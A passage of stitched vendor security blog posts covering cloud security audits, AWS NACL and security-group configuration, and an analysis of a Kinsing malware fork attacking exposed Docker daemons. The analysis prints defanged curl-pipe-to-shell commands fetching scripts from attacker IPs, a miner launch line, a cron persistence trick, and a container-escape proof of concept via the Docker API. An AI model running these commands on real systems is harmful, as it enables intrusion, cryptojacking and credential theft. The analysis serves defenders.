findings and lists any issues. It is presented to company management at an audit briefing. The report also provides actions for improvement. Take action: Companies form a team to address issues in the audit report. 
This team performs remediation actions. The audit process could take 12 weeks to complete. However, it could take longer for businesses to complete the recommended remediation tasks. The schedule may be extended if a gap analysis is required. Businesses can speed up the audit process using automated security tools . This software quickly provides a unified view of all security risks across multiple cloud vendors. Some CSPs, like Amazon Web Services (AWS) and Microsoft Azure, also offer auditing tools. These tools are exclusive to each specific platform. The price of a cloud audit varies based on its scope, the size of the organization, and the number of cloud platforms. For example, auditing one vendor could take four or five weeks. But a complex web with multiple vendors could take more than 12 weeks. 6 Fundamental Steps of a Cloud Security Audit Six crucial steps must be performed in a cloud audit: 1. Evaluate security posture Evaluate the security posture of the cloud system . This includes security controls, policies, procedures, documentation, and incident response plans. The auditor can interview IT staff, cloud vendor staff, and other stakeholders to collect evidence about information systems. Screenshots and paperwork are also used as proof. After this process, the auditor analyzes the evidence. They check if existing procedures meet industry guidelines, like the ones provided by Cloud Security Alliance (CSA). 2. Define the attack surface An attack surface includes all possible points, or attack vectors, through which unauthorized users can access and exploit a system. Since cloud solutions are so complex, this can be challenging. Organizations must use cloud monitoring and observability technologies to determine the attack surface. They must also prioritize high-risk assets and focus their remediation efforts on them. Auditors must identify all the applications and assets running within cloud instances and containers. 
They must check if the organization approves these or if they represent shadow IT. To protect data, all workloads within the cloud system must be standardized and have up-to-date security measures. 3. Implement robust access controls Access management breaches are a widespread security risk. Unauthorized personnel can get credentials to access sensitive cloud data using various methods. To minimize security issues related to unauthorized access, organizations must: Create comprehensive password guidelines and policies Mandate multi-factor authentication (MFA) Use the Principle of Least Privilege Access (PoLP) Restrict administrative rights 4. Enforce strict data sharing standards Organizations must establish strong standards for external data access and sharing. These standards dictate how data is viewed and accessed in shared drives, calendars, and folders. Start with restrictive standards and then loosen restrictions when necessary. External access should not be provided to files and folders containing sensitive data. This includes personally identifiable information (PII) and protected health information (PHI). 5. Use SIEM Security Information and Event Management (SIEM) systems can collect cloud logs in a standardized format. This gives auditors access to the logs and automatically generates the reports required by different compliance standards, helping organizations maintain compliance with industry security standards. 6. Automate patch management Regular security patches are crucial. However, many organizations and IT teams struggle with patch management. To create an efficient patch management process, organizations must: Focus on the most crucial patches first Regularly patch valuable assets using automation Add manual reviews to the automated patching process to ensure long-term security How Often Should Cloud Security Audits Be Conducted? As a general rule of thumb, audits are conducted annually or biannually.
But an audit should also be performed when: Mandated by regulatory standards. For example, Level 1 businesses must pass at least one audit per year to remain PCI DSS compliant. There is a higher risk level. Organizations storing sensitive data may need more frequent audits. There are significant changes to the cloud environment. Ultimately, the frequency of audits depends on the organization’s specific needs. The Major Cloud Security Audit Challenges Here are some of the major challenges that organizations may face: Lack of visibility Cloud infrastructures can be complex with many services and applications across different providers. Each cloud vendor has their own security policies and practices. They also provide limited access to operational and forensic data required for auditing. This lack of transparency prevents auditors from accessing pertinent data. To gather all relevant data, IT operations staff must coordinate with CSPs. Auditors must also carefully choose test cases to avoid violating the CSP’s security policies. Encryption Data in the cloud is encrypted using two methods — internal or provider encryption. Internal or on-premise encryption is when organizations encrypt data before it is transferred to the cloud. Provider encryption is when the CSP handles encryption. With on-premise encryption, the primary threat comes from malicious internal actors. In the latter method, any security breach of the cloud provider’s network can harm your data. From an auditing standpoint, it is best to encrypt data and manage encryption keys internally. If the CSP handles the encryption keys, auditing becomes nearly impossible. Colocation Many cloud providers use the same physical systems for multiple user organizations. This increases the security risk. It also makes it challenging for auditors to inspect physical locations. Organizations should use cloud vendors that use mechanisms to prevent unauthorized data access. 
For example, a cloud vendor must prevent users from claiming administrative rights to the entire system. Lack of standardization Cloud environments have ever-increasing entities for auditors to inspect. This includes managed databases, physical hosts, virtual machines (VMs), and containers. Auditing all these entities can be difficult, especially when there are constant changes to the entities. Standardized procedures and workloads help auditors identify all critical entities within cloud systems. Cloud Security Audit Checklist Here is a cloud security audit checklist with example actions taken for each general control area: The above list is not all-inclusive. Each cloud environment and process involved in auditing it is different. Industry Standards To Guide Cloud Security Audits Industry groups have created security standards to help companies maintain their security posture. Here are the five most recognized standards for cloud compliance and auditing: CSA Security, Trust, & Assurance Registry (STAR): This is a security assurance program run by the CSA. The STAR program is built on three fundamental techniques: CSA’s Cloud Control Matrix (CCM) Consensus Assessments Initiative Questionnaire (CAIQ) CSA’s Code of Conduct for GDPR Compliance CSA also has a registry of CSPs who have completed a self-assessment of their security controls. The program includes guidelines that can be used for cloud audits. ISO/IEC 27017:2015: The ISO/IEC 27017:2015 are guidelines for information security controls in cloud computing environments. ISO/IEC 27018:2019: The ISO/IEC 27018:2019 provides guidelines for protecting PII in public cloud computing environments. MTCS SS 584: Multi-Tier Cloud Security (MTCS) SS 584 is a cloud security standard developed by the Infocomm Media Development Authority (IMDA) of Singapore. The standard has guidelines for CSPs on information security controls. Cloud customers and auditors can use it to evaluate the security posture of CSPs.
CIS Foundations Benchmarks: The Center for Internet Security (CIS) Foundations Benchmarks are guidelines for securing IT systems and data. They help organizations of all sizes improve their security posture. Final Thoughts on Cloud Security Audits Cloud security audits are crucial for ensuring your cloud systems are secure and compliant. This is essential for data protection and preventing cybersecurity attacks. Auditors must use modern monitoring and CSPM tools like Prevasio to easily identify vulnerabilities in multi-vendor cloud environments. This software leads to faster audits and provides a unified view of all threats, making it easier to take relevant action. FAQs About Cloud Security Audits How do I become a cloud security auditor? To become a cloud security auditor, you need a certification like the Certificate of Cloud Security Knowledge (CCSK) or Certified Cloud Security Professional (CCSP). Prior experience in IT auditing, cloud security management, and cloud risk assessment is highly beneficial. Other certifications like the Certificate of Cloud Auditing Knowledge (CCAK) by ISACA and CSA could also help. In addition, knowledge of security guidelines and compliance frameworks, including PCI DSS, ISO 27001, SOC 2, and NIST, is also required.
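Teams that automate parts of the audit process often start by codifying checklist items as simple pass/fail checks. The sketch below is a minimal, hypothetical example: the control names, configuration keys, and sample snapshot are invented for illustration, and a real audit would pull this data from CSP APIs or CSPM tooling.

```python
# Hypothetical checklist controls expressed as pass/fail checks.
# Control names and configuration keys are invented for this sketch.
CHECKS = {
    "mfa_enforced": lambda cfg: cfg.get("mfa_enforced") is True,
    "no_public_storage": lambda cfg: not cfg.get("public_buckets"),
    "encryption_at_rest": lambda cfg: cfg.get("encryption_at_rest") == "enabled",
}

def run_audit(cfg):
    """Return a findings report mapping each control to 'pass' or 'fail'."""
    return {name: ("pass" if check(cfg) else "fail") for name, check in CHECKS.items()}

# A made-up account snapshot: MFA is on, but one storage bucket is public.
snapshot = {
    "mfa_enforced": True,
    "public_buckets": ["legacy-assets"],
    "encryption_at_rest": "enabled",
}
for control, result in run_audit(snapshot).items():
    print(control, result)  # no_public_storage fails in this snapshot
```

The value of this style is repeatability: the same checks run identically on every audit cycle, which supports the annual or event-driven cadence discussed above.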

  • AlgoSec | NACL best practices: How to combine security groups with network ACLs effectively

    Like all modern cloud providers, Amazon adopts the shared responsibility model for cloud security. Amazon guarantees secure... AWS NACL best practices: How to combine security groups with network ACLs effectively Prof. Avishai Wool 2 min read 8/28/23 Published Like all modern cloud providers, Amazon adopts the shared responsibility model for cloud security. Amazon guarantees secure infrastructure for Amazon Web Services, while AWS users are responsible for maintaining secure configurations. That requires using multiple AWS services and tools to manage traffic. You’ll need to develop a set of inbound rules for incoming connections between your Amazon Virtual Private Cloud (VPC) and all of its Elastic Compute (EC2) instances and the rest of the Internet. You’ll also need to manage outbound traffic with a series of outbound rules. Your Amazon VPC provides you with several tools to do this. The two most important ones are security groups and Network Access Control Lists (NACLs). Security groups are stateful firewalls that secure inbound traffic for individual EC2 instances. Network ACLs are stateless firewalls that secure inbound and outbound traffic for VPC subnets. Managing AWS VPC security requires configuring both of these tools appropriately for your unique security risk profile. This means planning your security architecture carefully to align it with the rest of your security framework. For example, your firewall rules impact the way Amazon Identity Access Management (IAM) handles user permissions. Some (but not all) IAM features can be implemented at the network firewall layer of security. Before you can manage AWS network security effectively, you must familiarize yourself with how AWS security tools work and what sets them apart.
Everything you need to know about security groups vs NACLs AWS security groups explained: Every AWS account has a single default security group assigned to the default VPC in every Region. It is configured to allow inbound traffic from network interfaces assigned to the same group, using any protocol and any port. It also allows all outbound traffic using any protocol and any port. Your default security group will also allow all outbound IPv6 traffic once your VPC is associated with an IPv6 CIDR block. You can’t delete the default security group, but you can create new security groups and assign them to AWS EC2 instances. Each security group can only contain up to 60 inbound and 60 outbound rules by default, but you can create up to 2,500 security groups per Region. You can associate many different security groups with a single instance, potentially combining hundreds of rules. These are all allow rules that permit traffic to flow according to the ports and protocols specified. For example, you might set up a rule that authorizes inbound traffic over IPv6 for Linux SSH sessions and sends it to a specific destination. This could be different from the destination you set for other TCP traffic. Security groups are stateful, which means that requests sent from your instance will be allowed to flow regardless of inbound traffic rules. Similarly, security groups automatically allow responses to inbound traffic to flow out regardless of outbound rules. However, since security groups do not support deny rules, you can’t use them to block a specific IP address from connecting with your EC2 instance. Be aware that Amazon EC2 automatically blocks email traffic on port 25 by default – but this is not included as a specific rule in your default security group. AWS NACLs explained: Your VPC comes with a default NACL configured to automatically allow all inbound and outbound network traffic. Unlike security groups, NACLs filter traffic at the subnet level.
That means that Network ACL rules apply to every EC2 instance in the subnet, allowing users to manage AWS resources more efficiently. Every subnet in your VPC must be associated with a Network ACL. Any single Network ACL can be associated with multiple subnets, but each subnet can only be assigned to one Network ACL at a time. Every rule has its own rule number, and Amazon evaluates rules in ascending order. The most important characteristic of NACL rules is that they can deny traffic. Amazon evaluates these rules when traffic enters or leaves the subnet – not while it moves within the subnet. You can access more granular data on data flows using VPC flow logs. Since Amazon evaluates NACL rules in ascending order, make sure that you place deny rules earlier in the table than rules that allow traffic to multiple ports. You will also have to create specific rules for IPv4 and IPv6 traffic – AWS treats these as two distinct types of traffic, so rules that apply to one do not automatically apply to the other. Once you start customizing NACLs, you will have to take into account the way they interact with other AWS services. For example, Elastic Load Balancing won’t work if your NACL contains a deny rule excluding traffic from 0.0.0.0/0 or the subnet’s CIDR. You should create specific inclusions for services like Elastic Load Balancing, AWS Lambda, and AWS CloudWatch. You may need to set up specific inclusions for third-party APIs, as well. You can create these inclusions by specifying ephemeral port ranges that correspond to the services you want to allow. For example, NAT gateways use ports 1024 to 65535. This is the same range covered by AWS Lambda functions, but it’s different than the range used by Windows operating systems. When creating these rules, remember that unlike security groups, NACLs are stateless. That means that when responses to allowed traffic are generated, those responses are subject to NACL rules. 
Misconfigured NACLs can deny traffic responses that should be allowed, leading to errors, reduced visibility, and potential security vulnerabilities.

How to configure and map NACL associations

A major part of optimizing NACL architecture involves mapping the associations between security groups and NACLs. Ideally, you want to enforce a specific set of rules at the subnet level using NACLs, and a different set of instance-specific rules at the security group level. Keeping these rulesets separate will prevent you from setting inconsistent rules and accidentally causing unpredictable performance problems. The first step in mapping NACL associations is using the Amazon VPC console to find out which NACL is associated with a particular subnet. Since NACLs can be associated with multiple subnets, you will want to create a comprehensive list of every association and the rules they contain.

To find out which NACL is associated with a subnet:
1. Open the Amazon VPC console.
2. Select Subnets in the navigation pane.
3. Select the subnet you want to inspect. The Network ACL tab will display the ID of the ACL associated with that subnet, and the rules it contains.

To find out which subnets are associated with a NACL:
1. Open the Amazon VPC console.
2. Select Network ACLs in the navigation pane. The Associated With column shows how many subnets each NACL covers.
3. Select a Network ACL from the list.
4. Click Subnet associations on the details pane. The pane will show you all subnets associated with the selected Network ACL.

Now that you know the difference between security groups and NACLs and can map the associations between your subnets and NACLs, you’re ready to implement some security best practices that will help you strengthen and simplify your network architecture.
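The console walk-through above can also be scripted. Assuming JSON shaped like the output of `aws ec2 describe-network-acls` (the IDs below are made up), a short Python sketch inverts the associations into a subnet-to-NACL table:

```python
import json

# Hypothetical sample shaped like `aws ec2 describe-network-acls` output.
sample = json.loads("""
{"NetworkAcls": [
  {"NetworkAclId": "acl-0a1b2c3d",
   "Associations": [{"SubnetId": "subnet-111"}, {"SubnetId": "subnet-222"}]},
  {"NetworkAclId": "acl-4e5f6a7b",
   "Associations": [{"SubnetId": "subnet-333"}]}
]}
""")

# One NACL may cover many subnets, but each subnet has exactly one NACL,
# so inverting the associations gives an unambiguous map.
subnet_to_nacl = {
    assoc["SubnetId"]: acl["NetworkAclId"]
    for acl in sample["NetworkAcls"]
    for assoc in acl["Associations"]
}
print(subnet_to_nacl)
```

Feeding this the real CLI output for your VPC would produce the comprehensive association list the text recommends keeping.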
5 best practices for AWS NACL management

Pay close attention to default NACLs, especially at the beginning

Since every VPC comes with a default NACL, many AWS users jump straight into configuring their VPC and creating subnets, leaving NACL configuration for later. The problem here is that every subnet associated with your VPC will inherit the default NACL. This allows all traffic to flow into and out of the network. Going back and building a working security policy framework later will be difficult and complicated – especially if adjustments are still being made to your subnet-level architecture. Taking time to create custom NACLs and assign them to the appropriate subnets as you go will make it much easier to keep track of changes to your security posture as you modify your VPC moving forward.

Implement a two-tiered system where NACLs and security groups complement one another

Security groups and NACLs are designed to complement one another, yet not every AWS VPC user configures their security policies accordingly. Mapping out your assets can help you identify exactly what kind of rules need to be put in place, and may help you determine which tool is the best one for each particular case. For example, imagine you have a two-tiered web application with web servers in one security group and a database in another. You could establish inbound NACL rules that allow external connections to your web servers from anywhere in the world (enabling port 443 connections) while strictly limiting access to your database (by only allowing port 3306 connections for MySQL).

Look out for ineffective, redundant, and misconfigured deny rules

Amazon recommends placing deny rules first in the sequential list of rules that your NACL enforces. Since you’re likely to enforce multiple deny rules per NACL (and multiple NACLs throughout your VPC), you’ll want to pay close attention to the order of those rules, looking for conflicts and misconfigurations that will impact your security posture.
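The two-tiered web application example above can be made concrete. The Python sketch below models only the intent of such a ruleset (group names and addresses are invented; this is not AWS syntax): the web tier is open to the world on 443, and the database is reachable only from the web tier on 3306.

```python
# Illustrative intent model for a two-tier ruleset; not AWS syntax.
rules = {
    "web-sg": [{"port": 443, "source": "0.0.0.0/0"}],  # HTTPS from anywhere
    "db-sg":  [{"port": 3306, "source": "web-sg"}],    # MySQL from web tier only
}

def allowed(group, port, source):
    # Traffic passes if some rule in the group matches the port and
    # either the specific source or the anywhere block.
    return any(r["port"] == port and r["source"] in (source, "0.0.0.0/0")
               for r in rules[group])

print(allowed("web-sg", 443, "203.0.113.9"))  # True: anyone reaches the web tier
print(allowed("db-sg", 3306, "web-sg"))       # True: web tier reaches MySQL
print(allowed("db-sg", 3306, "203.0.113.9"))  # False: internet cannot reach the DB
```

In AWS itself, the "source is another security group" pattern is expressed by referencing a security group ID as the source of an ingress rule.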
Similarly, you should pay close attention to the way security group rules interact with your NACLs. Even misconfigurations that are harmless from a security perspective may end up impacting the performance of your instance, or causing other problems. Regularly reviewing your rules is a good way to prevent these mistakes from occurring.

Limit outbound traffic to the required ports or port ranges

When creating a new NACL, you have the ability to apply inbound or outbound restrictions. There may be cases where you want to set outbound rules that allow traffic from all ports. Be careful, though: this may introduce vulnerabilities into your security posture. It’s better to limit access to the required ports, or to specify the corresponding port range for outbound rules. This applies the principle of least privilege to outbound traffic and limits the risk of unauthorized access that may occur at the subnet level.

Test your security posture frequently and verify the results

How do you know if your particular combination of security groups and NACLs is optimal? Testing your architecture is a vital step towards making sure you haven’t left out any glaring vulnerabilities. It also gives you a good opportunity to address misconfiguration risks. This doesn’t always mean actively running penetration tests with experienced red team consultants, although that’s a valuable way to ensure best-in-class security. It also means taking time to validate your rules by running small tests with an external device. Consider using AWS flow logs to trace the way your rules direct traffic and using that data to improve your work.

How to diagnose security group rules and NACL rules with flow logs

Flow logs allow you to verify whether your firewall rules follow security best practices effectively. You can follow data ingress and egress and observe how data interacts with your AWS security rule architecture at each step along the way.
This gives you clear visibility into how efficient your route tables are, and may help you configure your internet gateways for optimal performance. Before you can use the flow log CLI, you will need to create an IAM role that includes a policy granting users the permission to create, configure, and delete flow logs. Flow logs are available at three distinct levels, each accessible through its own console:

Network interfaces
VPCs
Subnets

You can use the ping command from an external device to test the way your instance’s security group and NACLs interact. Your security group rules (which are stateful) will allow the response ping from your instance to go through. Your NACL rules (which are stateless) will not allow the outbound ping response to travel back to your device unless an outbound rule explicitly permits it. You can look for this activity through a flow log query. Here is a quick tutorial on how to create a flow log query to check your AWS security policies. First you’ll need to create a flow log in the AWS CLI. This is an example that captures all traffic for a specified network interface. It delivers the flow logs to a CloudWatch log group with permissions specified in the IAM role:

aws ec2 create-flow-logs \
  --resource-type NetworkInterface \
  --resource-ids eni-1235b8ca123456789 \
  --traffic-type ALL \
  --log-group-name my-flow-logs \
  --deliver-logs-permission-arn arn:aws:iam::123456789101:role/publishFlowLogs

Assuming your test pings represent the only traffic flowing between your external device and EC2 instance, you’ll get two records that look like this:

2 123456789010 eni-1235b8ca123456789 203.0.113.12 172.31.16.139 0 0 1 4 336 1432917027 1432917142 ACCEPT OK
2 123456789010 eni-1235b8ca123456789 172.31.16.139 203.0.113.12 0 0 1 4 336 1432917094 1432917142 REJECT OK

To parse this data, you’ll need to familiarize yourself with flow log syntax.
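Records like the two above can be split into named fields with a few lines of Python, using the default Version 2 field order:

```python
# Field order for a default (Version 2) VPC flow log record.
FIELDS = ["version", "account_id", "interface_id", "srcaddr", "dstaddr",
          "srcport", "dstport", "protocol", "packets", "bytes",
          "start", "end", "action", "log_status"]

# First sample record from the text: the ping the security group accepted.
record = ("2 123456789010 eni-1235b8ca123456789 203.0.113.12 "
          "172.31.16.139 0 0 1 4 336 1432917027 1432917142 ACCEPT OK")

parsed = dict(zip(FIELDS, record.split()))
# Protocol 1 is ICMP in the IANA numbering, consistent with a ping test.
print(parsed["srcaddr"], parsed["protocol"], parsed["action"])
```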
Default flow log records contain 14 fields, although you can expand custom queries to return more than double that number:

Version tells you the version currently in use. Default flow log requests use Version 2. Expanded custom requests may use Version 3 or 4.
Account-id tells you the account ID of the owner of the network interface that traffic is traveling through. The record may display as unknown if the network interface is part of an AWS service like a Network Load Balancer.
Interface-id shows the unique ID of the network interface for the traffic currently under inspection.
Srcaddr shows the source of incoming traffic, or the address of the network interface for outgoing traffic. For a network interface, this is always its private IPv4 address.
Dstaddr shows the destination of outgoing traffic, or the address of the network interface for incoming traffic. For a network interface, this is always its private IPv4 address.
Srcport is the source port for the traffic under inspection.
Dstport is the destination port for the traffic under inspection.
Protocol refers to the corresponding IANA traffic protocol number.
Packets describes the number of packets transferred.
Bytes describes the number of bytes transferred.
Start shows the time when the first data packet was received. This could be up to one minute after the network interface transmitted or received the packet.
End shows the time when the last data packet was received. This can be up to one minute after the network interface transmitted or received the data packet.
Action describes what happened to the traffic under inspection: ACCEPT means the traffic was allowed to pass; REJECT means the traffic was blocked, typically by security groups or NACLs.
Log-status confirms the status of the flow log: OK means data is logging normally.
NODATA means no network traffic to or from the network interface was detected during the specified interval. SKIPDATA means some flow log records are missing, usually due to internal capacity constraints or other errors.

Going back to the example above, the flow log output shows that a user sent a command from a device with the IP address 203.0.113.12 to the network interface’s private IP address, which is 172.31.16.139. The security group’s inbound rules allowed the ICMP traffic to travel through, producing an ACCEPT record. However, the NACL did not let the ping response go through, because it is stateless. This generated the REJECT record that followed immediately after. If you configure your NACL to permit outbound ICMP traffic and run this test again, the second flow log record will change to ACCEPT.

Amazon Web Services (AWS) is one of the most popular options for organizations looking to migrate their business applications to the cloud. It’s easy to see why: AWS offers high capacity, scalable and cost-effective storage, and a flexible, shared responsibility approach to security. Essentially, AWS secures the infrastructure, and you secure whatever you run on that infrastructure. However, this model does raise some challenges. What exactly do you have control over? How can you customize your AWS infrastructure so that it isn’t just secure today, but will continue delivering robust, easily managed security in the future?

The basics: security groups

AWS offers virtual firewalls to organizations, for filtering traffic that crosses their cloud network segments. The AWS firewalls are managed using a concept called Security Groups. These are the policies, or lists of security rules, applied to an instance – a virtualized computer in the AWS estate.
AWS Security Groups are not identical to traditional firewalls, and they have some unique characteristics and functionality that you should be aware of. We’ve discussed them in detail in video lesson 1: the fundamentals of AWS Security Groups, but the crucial points are as follows. First, security groups do not deny traffic – all the rules in security groups are positive, and allow traffic. Second, while security group rules can be set to specify a traffic source, or a destination, they cannot specify both on the same rule. This is because AWS always sets the unspecified side (source or destination) as the instance to which the group is applied. Finally, a single security group can be applied to multiple instances, or multiple security groups can be applied to a single instance: AWS is very flexible. This flexibility is one of the unique benefits of AWS, allowing organizations to build bespoke security policies across different functions and even operating systems, mixing and matching them to suit their needs.

Adding Network ACLs into the mix

To further enhance and enrich its security filtering capabilities, AWS also offers a feature called Network Access Control Lists (NACLs). Like security groups, each NACL is a list of rules, but there are two important differences between NACLs and security groups. The first difference is that NACLs are not directly tied to instances, but to the subnet within your AWS virtual private cloud that contains the relevant instance. This means that the rules in a NACL apply to all of the instances within the subnet, in addition to all the rules from the security groups. So a specific instance inherits all the rules from the security groups associated with it, plus the rules from the NACL (if any) associated with the subnet containing that instance. As a result, NACLs have a broader reach, and affect more instances than a security group does.
The second difference is that NACLs can be written to include an explicit action, so you can write ‘deny’ rules – for example, to block traffic from a particular set of IP addresses which are known to be compromised. The ability to write ‘deny’ actions is a crucial part of NACL functionality.

It’s all about the order

When you have the ability to write both ‘allow’ rules and ‘deny’ rules, the order of the rules becomes important. If you switch the order between a ‘deny’ and an ‘allow’ rule, you potentially change your filtering policy quite dramatically. To manage this, AWS uses the concept of a ‘rule number’ within each NACL. By specifying the rule number, you can identify the correct order of the rules for your needs. You can choose which traffic you deny at the outset, and which you then actively allow. As such, with NACLs you can manage security tasks in a way that you cannot do with security groups alone. However, we did point out earlier that an instance inherits security rules from both the security groups and the NACLs – so how do these interact? The order in which rules are evaluated is as follows: for inbound traffic, AWS’s infrastructure first assesses the NACL rules. If traffic gets through the NACL, then all the security groups that are associated with that specific instance are evaluated; the order in which this happens within and among the security groups is unimportant because they are all ‘allow’ rules. For outbound traffic, this order is reversed: the traffic is first evaluated against the security groups, and then finally against the NACL that is associated with the relevant subnet. You can see me explain this topic in person in my new whiteboard video.

AlgoSec | Kinsing Punk: An Epic Escape From Docker Containers

Cloud Security | Rony Moshkovich | 2 min read | Published 8/22/20

We all remember how a decade ago, Windows password trojans were harvesting credentials that some email or FTP clients kept on disk in an unencrypted form. Network-aware worms were brute-forcing the credentials of weakly-restricted shares to propagate across networks. Some of them were piggy-backing on Windows Task Scheduler to activate remote payloads. Today, it’s déjà vu all over again. Only in the world of Linux. As reported earlier this week by Cado Security, a new fork of Kinsing malware propagates across misconfigured Docker platforms and compromises them with a coinminer. In this analysis, we wanted to break down some of its components and get a closer look into its modus operandi. As it turned out, some of its tricks, such as breaking out of a running Docker container, are quite fascinating. Let’s start with its simplest trick: the credentials grabber.

AWS Credentials Grabber

If you are using cloud services, chances are you may have used Amazon Web Services (AWS). Once you log in to your AWS Console, create a new IAM user, and configure its type of access to be Programmatic access, the console will provide you with the Access key ID and Secret access key of the newly created IAM user. You will then use those credentials to configure the AWS Command Line Interface (CLI) with the aws configure command. From that moment on, instead of using the web GUI of your AWS Console, you can achieve the same programmatically through the AWS CLI. There is one little caveat, though.
The AWS CLI stores your credentials in a clear-text file called ~/.aws/credentials. The documentation clearly explains that: "The AWS CLI stores sensitive credential information that you specify with aws configure in a local file named credentials, in a folder named .aws in your home directory." That means your cloud infrastructure is only as secure as your local computer. It was only a matter of time before the bad guys noticed such low-hanging fruit and used it for their profit. As a result, these files are harvested for all users on the compromised host and uploaded to the C2 server.

Hosting

For hosting, the malware relies on other compromised hosts. For example, dockerupdate[.]anondns[.]net runs an obsolete version of SugarCRM, vulnerable to exploits. The attackers compromised this server, installed the b374k webshell, and then uploaded several malicious files to it, starting from 11 July 2020. A server at 129[.]211[.]98[.]236, where the worm hosts its own body, is a vulnerable Docker host.
According to Shodan, this server currently hosts a malicious Docker container image system_docker, which is spun up with the following parameters:

./nigix --tls-url gulf.moneroocean.stream:20128 -u [MONERO_WALLET] -p x --currency monero --httpd 8080

A history of the executed container images suggests this host has executed multiple malicious scripts under an instance of the alpine container image:

chroot /mnt /bin/sh -c 'iptables -F; chattr -ia /etc/resolv.conf; echo "nameserver 8.8.8.8" > /etc/resolv.conf; curl -m 5 http[://]116[.]62[.]203[.]85:12222/web/xxx.sh | sh'
chroot /mnt /bin/sh -c 'iptables -F; chattr -ia /etc/resolv.conf; echo "nameserver 8.8.8.8" > /etc/resolv.conf; curl -m 5 http[://]106[.]12[.]40[.]198:22222/test/yyy.sh | sh'
chroot /mnt /bin/sh -c 'iptables -F; chattr -ia /etc/resolv.conf; echo "nameserver 8.8.8.8" > /etc/resolv.conf; curl -m 5 http[://]139[.]9[.]77[.]204:12345/zzz.sh | sh'
chroot /mnt /bin/sh -c 'iptables -F; chattr -ia /etc/resolv.conf; echo "nameserver 8.8.8.8" > /etc/resolv.conf; curl -m 5 http[://]139[.]9[.]77[.]204:26573/test/zzz.sh | sh'

Docker Lan Pwner

A special module called docker lan pwner is responsible for propagating the infection across other Docker hosts. To understand the mechanism behind it, it’s important to remember that a non-protected Docker host effectively acts as a backdoor trojan. Configuring the Docker daemon to listen for remote connections is easy. All it requires is one extra entry such as -H tcp://127.0.0.1:2375 (or 0.0.0.0 to accept connections from any host) in the systemd unit file or daemon.json file. Once configured and restarted, the daemon will expose port 2375 to clients:

$ sudo netstat -tulpn | grep dockerd
tcp 0 0 127.0.0.1:2375 0.0.0.0:* LISTEN 16039/dockerd

To attack other hosts, the malware collects network segments for all network interfaces with the help of the ip route show command. For example, for an interface with an assigned IP 192.168.20.25, the IP range of all available hosts on that network could be expressed in CIDR notation as 192.168.20.0/24.
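That CIDR derivation is easy to reproduce with Python's standard ipaddress module (assuming the interface has a /24 netmask, as in the example):

```python
import ipaddress

# An interface at 192.168.20.25 with a 255.255.255.0 (/24) netmask
# sits in the network 192.168.20.0/24 -- the block the worm scans.
iface = ipaddress.ip_interface("192.168.20.25/24")
print(iface.network)  # 192.168.20.0/24
```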
For each collected network segment, it launches the masscan tool to probe each IP address from the specified segment, on the following ports:

2375 (docker) – Docker REST API (plain text)
2376 (docker-s) – Docker REST API (SSL)
2377 (swarm) – RPC interface for Docker Swarm
4243 (docker) – old Docker REST API (plain text)
4244 (docker-basic-auth) – authentication for the old Docker REST API

The scan rate is set to 50,000 packets/second. For example, running the masscan tool over the CIDR block 192.168.20.0/24 on port 2375 may produce output similar to:

$ masscan 192.168.20.0/24 -p2375 --rate=50000
Discovered open port 2375/tcp on 192.168.20.25

From the output above, the malware selects the word at the 6th position, which is the detected IP address. Next, the worm runs zgrab, a banner grabber utility, to send an HTTP request "/v1.16/version" to the selected endpoint. For example, sending such a request to a local instance of a Docker daemon returns the daemon's version information in JSON form. Next, it applies the grep utility to parse the contents returned by the banner grabber zgrab, making sure the returned JSON contains either an "ApiVersion" or a "client version 1.16" string in it. The latest version of the Docker daemon will have "ApiVersion" in its banner. Finally, it applies jq, a command-line JSON processor, to parse the JSON, extract the "ip" field from it, and return it as a string. With all the steps above combined, the worm simply returns a list of IP addresses for the hosts that run the Docker daemon, located in the same network segments as the victim.
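The field-extraction step is easy to reproduce locally. The Python sketch below hardcodes sample masscan output and picks the 6th whitespace-separated token from each "Discovered" line, mirroring what the worm's shell pipeline does:

```python
# Sample output in masscan's "Discovered open port ..." format.
masscan_output = """Discovered open port 2375/tcp on 192.168.20.25
Discovered open port 4243/tcp on 192.168.20.77"""

# The IP address is the 6th word (index 5) on each result line.
ips = [line.split()[5] for line in masscan_output.splitlines()
       if line.startswith("Discovered")]
print(ips)  # ['192.168.20.25', '192.168.20.77']
```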
For each returned IP address, it will attempt to connect to the Docker daemon listening on one of the enumerated ports, and instruct it to download and run the specified malicious script:

docker -H tcp://[IP_ADDRESS]:[PORT] run --rm -v /:/mnt alpine chroot /mnt /bin/sh -c "curl [MALICIOUS_SCRIPT] | bash; ..."

The malicious script employed by the worm allows it to execute code directly on the host, effectively escaping the boundaries imposed by the Docker containers. We’ll get down to this trick in a moment. For now, let’s break down the instructions passed to the Docker daemon. The worm instructs the remote daemon to execute a legitimate alpine image with the following parameters:

The --rm switch will cause Docker to automatically remove the container when it exits.
-v /:/mnt is a bind mount parameter that instructs the Docker runtime to mount the host’s root directory / within the container as /mnt.
chroot /mnt will change the root directory for the current running process to /mnt, which corresponds to the root directory / of the host.
Finally, a malicious script is downloaded and executed.

Escaping From the Docker Container

The malicious script downloaded and executed within the alpine container first checks if the user’s crontab, a special configuration file that specifies shell commands to run periodically on a given schedule, contains the string "129[.]211[.]98[.]236":

crontab -l | grep -e "129[.]211[.]98[.]236" | grep -v grep

If it does not contain such a string, the script will set up a new cron job with:

echo "setup cron"
( crontab -l 2>/dev/null
echo "* * * * * $LDR http[:]//129[.]211[.]98[.]236/xmr/mo/mo.jpg | bash; crontab -r > /dev/null 2>&1" ) | crontab -

The code snippet above will suppress the "no crontab for username" message, and create a new scheduled task to be executed every minute. The scheduled task consists of two parts: download and execute the malicious script, then delete all scheduled tasks from the crontab.
This will effectively execute the scheduled task only once, with a one-minute delay. After that, the container quits. There are two important points associated with this trick:

Because the Docker container’s root directory was mapped to the host’s root directory /, any task scheduled inside the container is automatically scheduled in the host’s root crontab.
Because the Docker daemon runs as root, a remote non-root user that follows these steps creates a task in the root’s crontab, to be executed as root.

Building a PoC

To test this trick in action, let’s create a shell script that prints "123" into a file _123.txt located in the root directory /:

echo "setup cron"
( crontab -l 2>/dev/null
echo "* * * * * echo 123>/_123.txt; crontab -r > /dev/null 2>&1" ) | crontab -

Next, let’s pass this script encoded in base64 format to the Docker daemon running on the local host:

docker -H tcp://127.0.0.1:2375 run --rm -v /:/mnt alpine chroot /mnt /bin/sh -c "echo '[OUR_BASE_64_ENCODED_SCRIPT]' | base64 -d | bash"

Upon execution of this command, the alpine image starts and quits. This can be confirmed with the empty list of running containers:

$ docker -H tcp://127.0.0.1:2375 ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES

